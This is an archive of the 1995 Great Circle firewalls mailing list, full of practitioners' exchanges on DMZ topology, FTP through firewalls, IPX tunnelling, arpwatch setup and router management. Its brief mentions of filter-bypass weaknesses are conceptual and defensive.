1995, Yannick Gravel wrote: > > > Hi Net&Sys Security poeples, > > > > Something that everybody is talking about, but not everybody > > is saying the same thing about subnetting: > > > > Yes, everybody agree that we lose the first and last host of > > each subnet for net.iding and broadcasting. > > > > But, some are saying that I can use all subnet; but others are > > saying that we lose the first and last subnet... > > > > Whom truth is true.. > > > > Thanks.. > > > > Yannick Gravel > > System administrator -- yannick.gravel@planet-int.net > > > From firewalls-owner Sun Oct 15 18:00:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA26426 for firewalls-outgoing; Sun, 15 Oct 1995 17:50:09 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA26419 for ; Sun, 15 Oct 1995 17:50:01 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id KAA03548; Mon, 16 Oct 1995 10:43:15 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma003545; Mon Oct 16 10:43:10 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA10408; Mon, 16 Oct 1995 10:49:13 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9510160049.AA10408@citecub.citec.qld.gov.au> Subject: Re: Firewalls To: jonw@mntcmp2.demon.co.uk (Jon Whitton) Date: Mon, 16 Oct 95 10:49:12 EST Cc: firewalls@greatcircle.com In-Reply-To: ; from "Jon Whitton" at Oct 15, 95 7:28 am X-Mailer: ELM [version 2.3 PL11] content-length: 3472 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Try this: Outside | | Router | | -------------------------- | | | | bastion ftp/www/??? server | | -------------- | | Router | | ----------------------- | | | | | | Inside hosts That way there is now physical way to bypass the bastion. The external router must accept packets for either bastion and other server(s). The application gateways should only accept connections from the inside. Of course it means inside access to the external server is also via the bastion but I do not consider that a bad thing. Colin My mailer thinks Jon Whitton said: > > > We are planning to have a public access web/ftp site on the outside of a > firewall. This machine does not need to be 100% secure. Our internal office net > will also be connected to the same leaseline and this net will need to be secure. > We plan to use packet filters on the Ciscos and application proxys on the > bastion machine: > > > ISP +-----------+ +-----------+ > Lease | Cisco | | Bastion | Application proxys > ----- | 2501 |----------------------| machine | primary DNS > Line | | | | | > +-----------+ | +-----------+ > | > | +-----------+ > | | ftp/web | Insecure > |-----------| machine | Public > | | | Access machine > | +-----------+ > | > +-----------+ > | Cisco | Dual Homed > | 2514 | Gateway > | | > +-----------+ > | > | > -------------------|------------------------ Secure Internal > | | | TCP/IP Network > +-----------+ +-----------+ +-----------+ > | Machine | | Machine | ..... | Machine | > | 1 | | 2 | | n | > > The bastion will also be the primary DNS machine and have our main hostname > (something like mntcmp.co.uk). > > My query is where can the ftp/web server be placed so that the traffic does > not need to go via the bastion machine. Obviously we need to keep the web/ftp > server as fast as possible, hence the requirement for it not to receive/TX > traffic via the bastion. > > Is this possible? > > I believe the Cisco 2501 can only route to one designated machine (bastion). > Is this correct? If so can we use a different Cisco to route ftp/www traffic > directly to the ftp/www server and all other traffic to the bastion? > Would this be a solution? > > There will be no requirement for http to/from the secure office net. So a > routing solution maybe possible? > > TIA, Jon. > > -- > ================================================================================ > > Jon Whitton. Internet Address: jonw@mntcmp2.demon.co.uk > > ================================================================================ > -- > From firewalls-owner Sun Oct 15 19:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA28471 for firewalls-outgoing; Sun, 15 Oct 1995 19:20:24 -0700 Received: from locust.net.ohio-state.edu (locust.net.ohio-state.edu [128.146.222.110]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA28464 for ; Sun, 15 Oct 1995 19:20:20 -0700 Received: from bedbugs.net.ohio-state.edu (bedbugs [128.146.222.2]) by locust.net.ohio-state.edu (8.6.12/8.6.9) with ESMTP id WAA10467; Sun, 15 Oct 1995 22:18:36 -0400 Received: (from maf@localhost) by bedbugs.net.ohio-state.edu (8.6.12/8.6.9) id WAA06578; Sun, 15 Oct 1995 22:18:35 -0400 From: "Mark A. Fullmer" Message-Id: <199510160218.WAA06578@bedbugs.net.ohio-state.edu> Subject: Re: FTP vulnerabilities To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson P.E. Information Security) Date: Sun, 15 Oct 1995 22:18:35 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <951015200523.2106a541@hobbes.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Oct 15, 95 08:05:23 pm Reply-To: maf@net.ohio-state.edu X-Mailer: ELM [version 2.4 PL24 PGP1] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1381 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A. Padgett Peterson, P.E. Information Security writes: (on the topic of outgoing connection to TCP port 21 through firewall automagically opens up all incoming TCP connects to ports > 1024 for the initiating client) >>If Victim is inside the firewall, all Attacker needs to do is coerce >>Victim to initiate an outgoing connection to port 21 which then opens >>up the firewall. If Victim has an anonymous FTP server running, and the >>firewall allows a connection, this is just too easy: > >(commands omitted) > >Wait a moment. First if I allow outward connections only (b) goes away. Maybe a web server that redirects your client to evil.nasty:21 then? (is this possible?) The point I was trying to make is that dynamic filters have a flaw in that if an attacker can convince a client to send out a packet that disables the firewall you lose. Atleast for FTP, as you've said using PASV is a better solution. >Second if Joe connects to evil.nasty and I have an intelligent machine, >then it will allow evil.nasty to make a back connection only to Joe and >only to a port greater than 1023. I can even eliminate that by requiring >only PASV connections (how I wound up connecting to Marcus' machine). If connecting to ports > 1023 on Joe's machine isn't an issue, why even bother with the dynamic filter? IMHO it's just a false sense of security. -- mark maf+@osu.edu From firewalls-owner Mon Oct 16 01:43:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA03360 for firewalls-outgoing; Mon, 16 Oct 1995 01:33:43 -0700 Received: from funet.fi (funet.fi [130.230.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA03353 for ; Mon, 16 Oct 1995 01:33:39 -0700 Received: from relevantum.fi (actually user nobody@relevantum.fi) by funet.fi with SMTP (PP); Mon, 16 Oct 1995 10:31:46 +0200 Received: by relevantum.fi (4.1/SMI-4.1-MHS-7.0) id AA06917; Mon, 16 Oct 95 10:31:37 +0200 Date: Mon, 16 Oct 1995 10:31:36 +0200 (EET) From: Keinanen Vesa To: Danny Cox Cc: firewalls@greatcircle.com Subject: Re: Modems and IPX tunnelling In-Reply-To: <6373.9510131028@gmap.leeds.ac.uk> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Too open UDP access to your net is problem, because you don't know where your RPC-services live. In your case you can allow UDP packet w. port 213 (IP Tunneling) into your Netware server and that doesn't risk RPC-services you run in your Unix boxes. But you should be very worried about security on IPX and Netware services level. You don't get any IPX services level filtering on your Firewall router. Router only passes UDP port 213 through and has no idea what's inside. In this case there can be anything that IPX can carry. Next point for filtering is tunneling endpoing, your Netware server. Plain NW 3.11 or NW 4.x with IP tunneling doesn'tn do any service based filtering. Installing Novell's MultiProtocolRouter on you Netware server may help, don't know for sure. So the problems are not in IP level but on IPX and Netware services level. If you know that Netware services are secure, then just go on :-) (I don't know how secure enviroment Netware is). If you really need to pass IP tunneling through, you have better do some host based filtering on your firewall router: allow UDP 213 only FROM few hosts you know you can trust INTO your tunneling endpoint. And even that may be too open, because you are not opening single host access but a IPX routing tunnel. You will sleep a lot better if you find a setup, where you can do some IPX address and service level filtering on incoming traffic. VK -- Vesa Keinanen Nasilinnankatu 24 D, 33210 Tampere, Finland Relevantum Oy Phone +358 31 2147200, Fax +358 31 2147402 From firewalls-owner Mon Oct 16 04:00:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA05192 for firewalls-outgoing; Mon, 16 Oct 1995 03:47:59 -0700 Received: from funet.fi (funet.fi [130.230.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA05184 for ; Mon, 16 Oct 1995 03:47:12 -0700 Received: from relevantum.fi (actually user nobody@relevantum.fi) by funet.fi with SMTP (PP); Mon, 16 Oct 1995 12:44:53 +0200 Received: by relevantum.fi (4.1/SMI-4.1-MHS-7.0) id AA10128; Mon, 16 Oct 95 12:44:47 +0200 Date: Mon, 16 Oct 1995 12:44:46 +0200 (EET) From: Keinanen Vesa To: Danny Cox Cc: firewalls@greatcircle.com Subject: Re: Modems and IPX tunnelling In-Reply-To: <6856.9510160914@gmap.leeds.ac.uk> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I would suggest that you do your ipx tunnelling outside the firewall - > > put your Netware Server between the firewall router and your provider's > > router (DMZ). Allow IPX through the firewall router and block it through > > the provider's router. Allow IP/UDP and IP/TCP through the provider's router > > and block IP/UDP through the firewall router. Should be safe enough.... > Something like this: IPX IPX in IP <- - - - - -> < - - - - - - - - - - > Other NW-servers+ NW workstations Firewall +IPtunnel provider ------------------- router ----------------router ---- outside To get really use of this setup you have to "strengthen" it a bit: * "External" NW serveri is vulnerable, so strip it to handle only tunneling * Use smart Firewall router where you can do IPX address and Netware service based filtering. Let only the traffic out which is really necessary. Limit also services which you advertize out (SAP filtering)). VK From firewalls-owner Mon Oct 16 06:00:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA07219 for firewalls-outgoing; Mon, 16 Oct 1995 05:52:55 -0700 Received: from aspensys (aspensys.aspensys.com [198.77.70.104]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA07212 for ; Mon, 16 Oct 1995 05:52:52 -0700 Received: from smtpinet.aspensys.com (smtpgate.aspensys.com) by aspensys (5.0/SMI-SVR4) id AA15226; Mon, 16 Oct 1995 08:46:51 +0500 Received: from ccMail by smtpinet.aspensys.com (SMTPLINK V2.10.08) id AA813859144; Mon, 16 Oct 95 08:54:58 EST Date: Mon, 16 Oct 95 08:54:58 EST From: "Jim Meritt" Message-Id: <9509168138.AA813859144@smtpinet.aspensys.com> To: firewalls@greatcircle.com, Scott Surguine Cc: surguine@teal.csn.net Subject: Re: Question: Telnet & Packet Filtering content-length: 493 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This sounds really odd. When you say "telnet only", what exactly do you mean? Only connections to external in.telnetd? Use dumb terminals - that'll do it. Jim Meritt ______________________________ Reply Separator _________________________________ Subject: Question: Telnet & Packet Filtering Author: Scott Surguine at SMTPINET Date: 10/13/95 8:21 PM I would like to allow telnet OUTGOING ONLY accross the Cisco. Which is the best way to accomplish this? From firewalls-owner Mon Oct 16 06:44:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA08187 for firewalls-outgoing; Mon, 16 Oct 1995 06:34:55 -0700 Received: from irbs.irbs.com (irbs.com [199.182.75.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA08180 for ; Mon, 16 Oct 1995 06:34:51 -0700 Received: (from jc@localhost) by irbs.irbs.com (8.6.12/8.6.6) id JAA01951; Mon, 16 Oct 1995 09:32:43 -0400 From: John Capo Message-Id: <199510161332.JAA01951@irbs.irbs.com> Subject: Re: ARPWatch under FreeBSD To: cooker@ua.pt (Fernando Cozinheiro) Date: Mon, 16 Oct 1995 09:32:42 -0400 (EDT) Cc: firewalls@GreatCircle.COM, cooker@zeus.ci.ua.pt In-Reply-To: <199510142138.AA138656696@zeus.ci.ua.pt> from "Fernando Cozinheiro" at Oct 14, 95 09:38:16 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 992 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Fernando Cozinheiro writes: > > Dear friends: > > Few days ago, I've seen on this mailing list several references about > AprWatch, and I've tried to install it under FreeBSD. After small > modifications on the program, I've succeeded to compile it. > > Whenever I run it, appears messages like "arpwatch: pcap open: > /dev/bpf0: Device not configured" on the syslog output file. Does > anyone already succeeded to use ArpWatch program, under FreeBSD? > I have never used arpwatch but `/dev/bpf0: Device not configured' probably indicates that your kernel was not built with packet filters enabled. Cruise down to the end of your kernel config file and you will see pseudo-device loop pseudo-device ether ... pseudo-device blah Add pseudo-device bpfilter N where N is the number of simultaneous packet filters you want to use. Config, build, and install the new kernel. John Capo IRBS Engineering High performance FreeBSD systems From firewalls-owner Mon Oct 16 07:00:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA08316 for firewalls-outgoing; Mon, 16 Oct 1995 06:49:52 -0700 Received: from hatteras.ch.inri.com ([198.202.184.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA08309 for ; Mon, 16 Oct 1995 06:49:48 -0700 Received: from assateague (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id JAA01522; Mon, 16 Oct 1995 09:48:57 -0400 Date: Mon, 16 Oct 1995 09:48:57 -0400 Message-Id: <199510161348.JAA01522@hatteras.ch.inri.com> X-Sender: wlb@hatteras.ch.inri.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: sgcccdc@citec.qld.gov.au (Colin Campbell), matt@uts.EDU.AU (Jas) From: wbunting@ch.inri.com (Bill Bunting) Subject: Re: Various FTPs Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:51 AM 10/16/95 EST, Colin Campbell wrote: >Hi, > >My mailer thinks Jas said: >> >> Scott Barman wrote this... >> >> > On Thu, 12 Oct 1995 padgett@tccslr.dnet.mmc.com wrote: >> >> >> I agree with Marcus concerning the probloms in FTP & possibly IPV6 >> >> will repair/replace it. For now I suspect that the answer is a >> >> > I have been "observing" the output of the IETF for IPv6 and have seen >> > nothing regarding changing ftp. It seems their concerns are a larger >> > address space and security. I don't think I'm alone in my desire to see >> > something replace it and, as Marcus Ranum said about himself in a previous >> > note, I'm not "big" enough to try to force a change! >> >> well why dont we put our collective heads together and make a firewall >> friendly file transfer protocol? then we can have people write up the >> code on different platforms (we have enough knowledge here for almost >> every possible conceivable platform), and GPL the stuff. well? any >> takers? myself personally im in. >> > >Why doesn't PASV do the trick? > >Colin > > Here is a clip from an earlier posting of mine. The problem is how to do FTP when both sides require PASV as is the case with many firewalls. (i.e. firewall to firewall FTP is the problem) Internal users are allowed to use FTP to login to non firewall protected sites using passive FTP. However, in order to have an FTP session, one of the two sides must allow arbitrary port connections. If two firewall protected sites want to talk FTP, one of the two sides must allow arbitrary ports. With our firewall, this is not allowed. Here is what it looks like (To simplify, TIS fwtk proxy not shown): Client tries passive mode... C-|----------21-control-connection---|-> S C-|---21---PASV Command--------------|-> S C-|------arbitrary-port-for-data---->| S (blocked by server side firewall) Client tries PORT command.... C-|----------21-control-connection---|-> S C-|---21-PORT--Command---------------|-> S C |<------arbitrary-port-for-data----|- S (blocked by Client side firewall) regards, -Bill. --------------------------------------- | Bill Bunting, Software Engineer | ****** |Inter-National Research Institute, Inc.| ***_******_ __ _ | 1441 Crossways Boulevard, Suite 102 | ===//=/\**//=/- )==//= | Chesapeake, Virginia 23320 | {==//=//\\//=//||==//== | V(804)424-8675 F(804)420-4262 | =//=//==\/*//=||=//=== | (wbunting@inri.com) | ********* | (bunting@cs.odu.edu) | ***** | http://www.cs.odu.edu/~bunting | --------------------------------------- From firewalls-owner Mon Oct 16 07:30:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08952 for firewalls-outgoing; Mon, 16 Oct 1995 07:22:17 -0700 Received: from Fe3.rust.net (Fe3.rust.net [204.157.12.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA08936 for ; Mon, 16 Oct 1995 07:22:12 -0700 Received: from dtw-2.rust.net by Fe3.rust.net via SMTP (940816.SGI.8.6.9/940406.SGI.AUTO) id KAA21535; Mon, 16 Oct 1995 10:37:43 -0700 Date: Mon, 16 Oct 1995 10:37:43 -0700 Message-Id: <199510161737.KAA21535@Fe3.rust.net> X-Sender: janken@rust.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Bill Husler From: janken@rust.net (Kenneth J. Stephens) Subject: Re: Firewall1 Comparison -Reply Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think Bill Husler said: >Our local SunSoft rep just gave us a presentation on FW-1 and it seems >that FW-1 allows you to manage Cisco routers as well as FW-1 Filters (for >application gatewat and Dynamic packet filtering). This would provide >both levels and on separate boxes while centralizing administration. >Sound kinda cool. >Bill Do you really think it is a good idea to: 1. Keep your router passwords in your firewall so it can remote update your router configuration? 2. Send your router passwords over the net for remote update of your router configuration? 3. Allow remote update of your router configuration in any case, if you can avoid it? The whole concept of "It is easy" vs. "Is it secure" lies in this type of "feature." I vote no to the above questions. Yes; it does make my life more difficult. IMO the increased security level is worth the extra work. My $.02. Ken [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] [] [] Ken Stephens Senior Capacity Planner/Data Security Officer [] [] email: Ken_Stephens@miconsulting.com Voice (313) 876-5081 [] [] Michigan Employment Security Commission (MESC) Fax (313) 876-6827 [] [] 7th Fl. I.S. [] [] 7310 Woodward Ave [] [] Detroit, MI 48202 [] [] [] [] Millennium Consulting Your Security Policy is only [] [] 28234 Diesing Dr. as strong as your organization's [] [] Madison Heights, MI 48071 commitment to it. [] [] [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Mon Oct 16 08:44:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10428 for firewalls-outgoing; Mon, 16 Oct 1995 08:36:06 -0700 Received: from svcs1.digex.net (svcs1.digex.net [204.91.197.224]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA10421 for ; Mon, 16 Oct 1995 08:36:03 -0700 Received: from GWFX1.sysorex.com (gwfx1.sysorex.com [204.192.18.20]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id LAA02324; Mon, 16 Oct 1995 11:33:56 -0400 Received: from ccMail by GWFX1.sysorex.com (SMTPLINK V2.10.08) id AA813868592; Mon, 16 Oct 95 11:33:15 EST Date: Mon, 16 Oct 95 11:33:15 EST From: "Dave Druitt" Encoding: 15 Text Message-Id: <9509168138.AA813868592@GWFX1.sysorex.com> To: mah@ic.co.at, Anton J Aylward Cc: firewalls@greatcircle.com Subject: Re[2]: WE THE PEOPLE "....want the facts to make informed in Sender: firewalls-owner@GreatCircle.COM Precedence: bulk like the web of trust idea, but there are simpler ways. The most obvious one is to only accept postings from subscribers. list "manager" has every right to delete someone who abuses the aims and charter. Having a front-end filter which only alows posting by susbscribers is one way to do this. Without needing all the PGP technology. ______________ Hear, hear! Dave Druitt __________________ 'What's all this about bending the other cheek?' From firewalls-owner Mon Oct 16 09:04:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10677 for firewalls-outgoing; Mon, 16 Oct 1995 08:56:53 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA10670 for ; Mon, 16 Oct 1995 08:56:50 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id IAA05842; Mon, 16 Oct 1995 08:39:47 -0700 Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma005838; Mon Oct 16 08:39:19 1995 Received: (from murrell@localhost) by mocha.bctel.net (8.6.10/8.6.10) id IAA19622; Mon, 16 Oct 1995 08:36:22 -0700 Date: Mon, 16 Oct 1995 08:36:22 -0700 From: Brian Murrell Message-Id: <199510161536.IAA19622@mocha.bctel.net> To: firewalls@GreatCircle.COM, jonw@mntcmp2.demon.co.uk Subject: Re: Firewalls Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: NrAGHtJMh4GhL7Ud3zXUTQ== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > We are planning to have a public access web/ftp site on the outside of a > firewall. This machine does not need to be 100% secure. Our internal office net > will also be connected to the same leaseline and this net will need to be secure. > We plan to use packet filters on the Ciscos and application proxys on the > bastion machine: > > > ISP +-----------+ +-----------+ > Lease | Cisco | | Bastion | Application proxys > ----- | 2501 |----------------------| machine | primary DNS > Line | | | | | > +-----------+ | +-----------+ > | > | +-----------+ > | | ftp/web | Insecure > |-----------| machine | Public > | | | Access machine > | +-----------+ > | > +-----------+ > | Cisco | Dual Homed > | 2514 | Gateway > | | > +-----------+ > | > | > -------------------|------------------------ Secure Internal > | | | TCP/IP Network > +-----------+ +-----------+ +-----------+ > | Machine | | Machine | ..... | Machine | > | 1 | | 2 | | n | > I've never understood why this kind of configuration is ever contemplated. You've just put all of your eggs into one basket. If that 2514 ever goes, so does all security. Why not use something more along the lines of... ISP +-----------+ Lease | Cisco | ----- | 2501 |----------- Line | | | +-----------+ | | | +-----------+ | | ftp/web | Insecure | |--| machine | Public | | | | Access machine | | +-----------+ | | +-----------+ | | Cisco | | Dual Homed | 2514 | | Gateway | | | +-----------+ | |--------+ | +-----------+ | Bastion | Application proxys | machine | primary DNS | | +-----------+ | | -------------------|------------------------ Secure Internal | | | TCP/IP Network +-----------+ +-----------+ +-----------+ | Machine | | Machine | ..... | Machine | | 1 | | 2 | | n | Now even if the 2514 fails (or is mis-configured) there is still a NON-ROUTING basion host to comprimise before the internal network falls. b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Mon Oct 16 09:17:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA10998 for firewalls-outgoing; Mon, 16 Oct 1995 09:07:56 -0700 Received: from narq.avian.org (wet-string.avian.org [199.103.168.126]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA10990 for ; Mon, 16 Oct 1995 09:07:52 -0700 Received: (from hobbit@localhost) by narq.avian.org (8.6.12/_H*) id KAA02751 for firewalls@greatcircle.com; Mon, 16 Oct 1995 10:24:37 -0400 Date: Mon, 16 Oct 1995 10:24:37 -0400 From: *Hobbit* Message-Id: <199510161424.KAA02751@narq.avian.org> To: firewalls@greatcircle.com Subject: Correction Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Further investigation tells me that the firewall[s] in question -- that which can be hopped by coming from port 20 -- is *NOT* a Firewall-1. It is a different kind of packet filter. The client, myself, or something in between was confused. FW-1 in theory would not be open to this kind of attack because of the dynamic filtering. Another lesson against the blind "see if you can get in" type of evaluation. Still, this sort of shenanigan does bypass a good number of packet filters out there, so keep an eye on those X servers and nfsds and such... _H* From firewalls-owner Mon Oct 16 10:35:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12783 for firewalls-outgoing; Mon, 16 Oct 1995 10:18:43 -0700 Received: from avalon.dpc.com (avalon.dpc.com [192.101.159.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA12776 for ; Mon, 16 Oct 1995 10:18:39 -0700 Received: (from smap@localhost) by avalon.dpc.com (8.6.11/8.6.9) id KAA03543; Mon, 16 Oct 1995 10:16:14 -0700 Received: from gate(10.30.0.166) by avalon via smap (V1.3) id sma001528; Mon Oct 16 10:15:10 1995 Received: by gate.dpc.com (5.65/DEC-Ultrix/4.3) id AA05755; Mon, 16 Oct 1995 10:18:52 -0700 Received: by boomer.dpc.com (5.57/Ultrix3.0-C) id AA16293; Mon, 16 Oct 95 10:15:27 -0700 Date: Mon, 16 Oct 95 10:15:27 -0700 From: cbenson@boomer.dpc.com (Chuck Benson) Message-Id: <9510161715.AA16293@boomer.dpc.com> To: firewalls@greatcircle.com, hobbit@avian.org Subject: Re: Correction Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ok From firewalls-owner Mon Oct 16 10:45:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12869 for firewalls-outgoing; Mon, 16 Oct 1995 10:20:36 -0700 Received: from avalon.dpc.com (avalon.dpc.com [192.101.159.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA12859 for ; Mon, 16 Oct 1995 10:20:32 -0700 Received: (from smap@localhost) by avalon.dpc.com (8.6.11/8.6.9) id KAA04965; Mon, 16 Oct 1995 10:18:26 -0700 Received: from gate(10.30.0.166) by avalon via smap (V1.3) id sma003549; Mon Oct 16 10:17:24 1995 Received: by gate.dpc.com (5.65/DEC-Ultrix/4.3) id AA05769; Mon, 16 Oct 1995 10:21:07 -0700 Received: by boomer.dpc.com (5.57/Ultrix3.0-C) id AA16310; Mon, 16 Oct 95 10:17:41 -0700 Date: Mon, 16 Oct 95 10:17:41 -0700 From: cbenson@boomer.dpc.com (Chuck Benson) Message-Id: <9510161717.AA16310@boomer.dpc.com> To: firewalls@greatcircle.com, hobbit@avian.org Subject: Confirm Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ok 1A5863 From firewalls-owner Mon Oct 16 11:01:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA13133 for firewalls-outgoing; Mon, 16 Oct 1995 10:31:06 -0700 Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA13126 for ; Mon, 16 Oct 1995 10:31:00 -0700 Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma001116; Mon Oct 16 13:28:47 1995 Posted-Date: Mon, 16 Oct 1995 13:28:43 -0400 From: "Bryan D. Boyle" Message-Id: <9510161328.ZM2956@maverick.erenj.com> Date: Mon, 16 Oct 1995 13:28:43 -0400 In-Reply-To: janken@rust.net (Kenneth J. Stephens) "Re: Firewall1 Comparison -Reply" (Oct 16, 10:37am) References: <199510161737.KAA21535@Fe3.rust.net> X-Phone: (908) 730-3338 X-Saying: Strange problems call for strange solutions. X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s X-Mailer: Z-Mail (3.2.1 10apr95) To: firewalls@GreatCircle.COM Subject: Re: Firewall1 Comparison -Reply Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Oct 16, 10:37am, Kenneth J. Stephens wrote: > Subject: Re: Firewall1 Comparison -Reply > I think Bill Husler said: > >Our local SunSoft rep just gave us a presentation on FW-1 and it seems ^^^^^^^^^^^ Obviously unbiased...:) > > Do you really think it is a good idea to: > > 1. Keep your router passwords in your firewall so it can remote update your > router configuration? > > 2. Send your router passwords over the net for remote update of your router > configuration? > > 3. Allow remote update of your router configuration in any case, if you can > avoid it? > > The whole concept of "It is easy" vs. "Is it secure" lies in this type of > "feature." I vote no to the above questions. Yes; it does make my life > more difficult. IMO the increased security level is worth the extra work. I would echo a resounding "AMEN" to the last paragraph. I think that there are a number of dynamics at work here: 1. Is your opinion of a firewall one of a continuously morphing 'security' checkpoint? 2. Is your opinion of a firewall a means to execute company access and security policy? I would opine that if you view this technology as 1., then a different set of operational parameters would apply than if 2. was your charter. A fully functioning firewall, once debugged, configured, and stable, should probably be about as static a configuration as possible; alerts, new technology, and the like notwithstanding. Changes should probably only be made after the most rigorous examination of the technology, benefits to opening up the ports or whatever to the great unwashed populace (PUP). But, centralizing the control? Nah...that is how they managed to overthrow the czar...:) -- Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338 | PAGE: bboyle@apt1.pagemart.com #include | http://www.access.digex.net/~bdboyle/index.html "It seems that 'national security' is the root password to the Constitution. As with any dishonest superuser, the best countermeasure is strong encryption." -Phil Karn From firewalls-owner Mon Oct 16 11:53:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA15201 for firewalls-outgoing; Mon, 16 Oct 1995 11:30:34 -0700 Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA15187 for ; Mon, 16 Oct 1995 11:30:29 -0700 From: mulligan@future.incog.com Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id LAA21821; Mon, 16 Oct 1995 11:26:57 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA07062; Mon, 16 Oct 1995 12:28:02 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA10276; Mon, 16 Oct 1995 12:28:02 -0600 Message-Id: <9510161828.AA10276@future.incog.com> To: "Dave Druitt" Cc: mah@ic.co.at, Anton J Aylward , firewalls@greatcircle.com Subject: Re: Re[2]: WE THE PEOPLE "....want the facts to make informed in Reply-To: mulligan@incog.com In-Reply-To: Your message of "Mon, 16 Oct 1995 11:33:15 EST." 